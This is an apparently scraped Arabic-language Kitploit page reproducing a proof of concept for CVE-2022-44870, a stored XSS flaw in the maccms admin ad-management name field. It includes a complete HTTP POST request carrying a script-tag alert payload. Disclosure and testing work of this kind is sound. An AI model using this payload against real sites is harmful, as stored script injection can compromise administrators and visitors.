Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-44870 — maccms admin+ هجمات xss | Kitploit
أدوات/GitHubGitHub/cedric1314/cve-2022-44870
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubcedric1314/cve-2022-44870

CVE-2022-44870

maccms admin+ هجمات xss

عرض المستودع
2منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2022-44870

maccms admin+ هجمات XSS

نظرة عامة

معلومات موقع الشركة المصنعة: https://maccms.pro

عنوان تحميل الكود المصدري: https://github.com/maccmspro/maccms10.git

  1. الإصدار المتأثر: V2021.1000.2000

    صورة
  2. تفاصيل الثغرة

https://github.com/maccmspro/maccms10/issues/23

انتقل إلى الخلفية، ثم انتقل إلى الأساسيات > إدارة الإعلانات > الاسم،

أدخل payload1 في مربع الاسم:

قد يتسبب في هجمات XSS.

اسم الثغرة: XSS من نوع التخزين

مستوى الثغرة: خطر متوسط

موقع الثغرة: إدارة الإعلانات --> الاسم

أدخل في cat_title

http://127.0.0.1/admin.php/admin/banner/infocat.html

صورة

صورة
  1. إعادة إظهار الثغرات و POC

POST /admin.php/admin/banner/infocat.html HTTP/1.1

Host: 192.168.52.163

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0

Accept: /

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 65

Origin: http://192.168.52.163

تنزيل الأداة

Connection: close

Referer: http://192.168.52.163/admin.php/admin/banner/infocat.html

Cookie: PHPSESSID=qgaks01bl6ip8j7fseaabj4l9q

cat_id=&cat_title=%3Cscript%3Ealert(1)%3C%2Fscript%3E&cat_code=111

صورة